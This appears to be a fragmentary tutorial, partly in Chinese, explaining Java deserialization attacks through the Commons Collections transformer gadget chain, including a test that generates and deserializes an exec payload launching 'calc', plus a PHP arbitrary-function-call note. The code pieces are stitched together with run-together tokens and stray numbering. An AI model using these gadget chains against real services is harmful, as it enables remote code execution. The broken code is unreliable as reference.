public static void main(String args[]) throws Exception{ //This is the object we're going to serialize. String name = "bob"; //We'll write the serialized data to a file "name.ser" FileOutputStream fos = new FileOutputStream("name.ser"); ObjectOutputStream os = new ObjectOutputStream(fos); os.writeObject(name); os.close();
//Read the serialized data back infrom the file "name.ser" FileInputStream fis = new FileInputStream("name.ser"); ObjectInputStream ois = new ObjectInputStream(fis);
//Read the objectfrom the data stream, and convert it back to a String String nameFromDisk = (String)ois.readObject();
//Print the result. System.out.println(nameFromDisk); ois.close(); } }
Java LOVES sending serialized objects all over the place. For example: In HTTP requests – Parameters, ViewState, Cookies, you name it. RMI – The extensively used Java RMI protocol is 100% based on serialization RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects JMX – Again, relies on serialized objects being shot over the wire Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
@Test public void serializationTest() throws IOException, ClassNotFoundException { //This is the object we're going to serialize. PersonEntity person1 = newPersonEntity(); person1.setAge(25); person1.setId(0); person1.setName("Leslie");
//We'll write the serialized data to a file "object.ser" FileOutputStream fos = newFileOutputStream("object.ser"); ObjectOutputStream os = newObjectOutputStream(fos); os.writeObject(person1); os.close();
//Read the serialized data back in from the file "object.ser" FileInputStream fis = newFileInputStream("object.ser"); ObjectInputStream ois = newObjectInputStream(fis);
//Read the object from the data stream, and convert it back to a String PersonEntity objectFromDisk = (PersonEntity)ois.readObject();
//Print the result. System.out.println("ID:"+objectFromDisk.getId()+" Age:"+objectFromDisk.getAge()+" Name:"+objectFromDisk.getName()); ois.close(); }
/** * Transforms the input object (leaving it unchanged) into some output object. * * @param input the object to be transformed, should be left unchanged * @return a transformed object * @throws ClassCastException (runtime) if the input is the wrong class * @throws IllegalArgumentException (runtime) if the input is invalid * @throws FunctorException (runtime) if the transform cannot be completed */ public Object transform(Object input);
/** * Override to transform the valuewhen using <code>setValue</code>. * * @param value the valueto transform * @return the transformed value * @since Commons Collections 3.1 */ protected Object checkSetValue(Object value) { return valueTransformer.transform(value); }
/** * Constructor that performs no validation. * Use <code>getInstance</code> if you want that. * * @param methodName the method to call * @param paramTypes the constructor parameter types, not cloned * @param args the constructor arguments, not cloned */
/** * Transforms the input to result by invoking a method on the input. * * @param input the input object to transform * @return the transformed result, null if null input */ public Object transform(Object input) { if (input == null) { return null; } try { Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes);//这里便是我们关注的利用反射机制进行方法调用。 return method.invoke(input, iArgs);
} catch (NoSuchMethodException ex) { throw newFunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist"); } catch (IllegalAccessException ex) { throw newFunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed"); } catch (InvocationTargetException ex) { throw newFunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex); } }
/** * Transforms the input to result via each decorated transformer * * @param object the input object passed to the first transformer * @return the transformed result */ publicObjecttransform(Objectobject) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); //迭代了Object } returnobject; }
/** * Constructor that performs no validation. * Use <code>getInstance</code> if you want that. * * @param constantToReturn the constant to return each time */ public ConstantTransformer(Object constantToReturn) { super(); iConstant = constantToReturn; }
/** * Transforms the input by ignoring it and returning the stored constant instead. * * @param input the input object which is ignored * @return the stored constant */ public Object transform(Object input) { return iConstant; }
// Checkto make sure that types have not evolved incompatibly AnnotationType annotationType = null; try { annotationType = AnnotationType.getInstance(type);//判断第一个参数是否为AnnotationType,因此使用Retention.class传入较好。 } catch(IllegalArgumentException e) { // Classisno longer an annotation type; all bets are off return; }
public void exploitTest() throws Exception { Object exploitObject = PayloadGeneration.generateExecPayload("calc");
//We'll write the serialized data to a file "exploitObject.ser" FileOutputStream fos = newFileOutputStream("exploitObject.ser"); ObjectOutputStream os = newObjectOutputStream(fos); os.writeObject(exploitObject); os.close();
//Read the serialized data back in from the file "exploitObject.ser" FileInputStream fis = newFileInputStream("exploitObject.ser"); ObjectInputStream ois = newObjectInputStream(fis);
//Read the object from the data stream PersonEntity objectFromDisk = (PersonEntity)ois.readObject();
@Test public void dynamicProxyTest() { List list = newArrayList(); list.add("123");
ListProxy listProxy = newListProxy(list);
List proxy = List.class.cast( Proxy.newProxyInstance(list.getClass().getClassLoader(), list.getClass().getInterfaces(),listProxy) ); // listProxy代理了接口List,当
//System.out.println(mapProxy.size()); proxy.add("1"); for (Iterator iterator = proxy.iterator();iterator.hasNext();) { System.out.println(iterator.next()); }
System.out.println(proxy.size());
}
测试代码运行结果为:
1 2 3 4 5 6 7
123 1 java.lang.UnsupportedOperationException at serialization.SerializeTest$ListProxy.invoke(SerializeTest.java:196) at com.sun.proxy.$Proxy4.size(Unknown Source) at serialization.SerializeTest.dynamicProxyTest(SerializeTest.java:177) ...
/** * Factory method to create a lazily instantiated map. * * @param map the map to decorate, must not be null * @param factory the factory to use, must not be null * @throws IllegalArgumentException if map or factory is null */ public staticMap decorate(Map map, Transformer factory) { returnnew LazyMap(map, factory); }
并且存在get方法去触发transform操作:
1 2 3 4 5 6 7 8 9
public Object get(Object key) { // create valuefor keyif keyis not currently in the map if (map.containsKey(key) == false) { Object value = factory.transform(key); map.put(key, value); returnvalue; } returnmap.get(key); }
//We'll write the serialized data to a file "exploitObject.ser" FileOutputStream fos = newFileOutputStream("exploitObjectLazyMap.ser"); ObjectOutputStream os = newObjectOutputStream(fos); os.writeObject(exploitObjectLazyMap); os.close();
//Read the serialized data back in from the file "exploitObject.ser" FileInputStream fis = newFileInputStream("exploitObjectLazyMap.ser"); ObjectInputStream ois = newObjectInputStream(fis);
//Read the object from the data stream PersonEntity objectFromDisk = (PersonEntity)ois.readObject();
publicfunctiondisconnect() { // Close the connection. if ($this->connection) { foreach ($this->disconnectHandlers as $h) { call_user_func_array($h, array( &$this));//调用任意函数,无法控制第二个参数。 }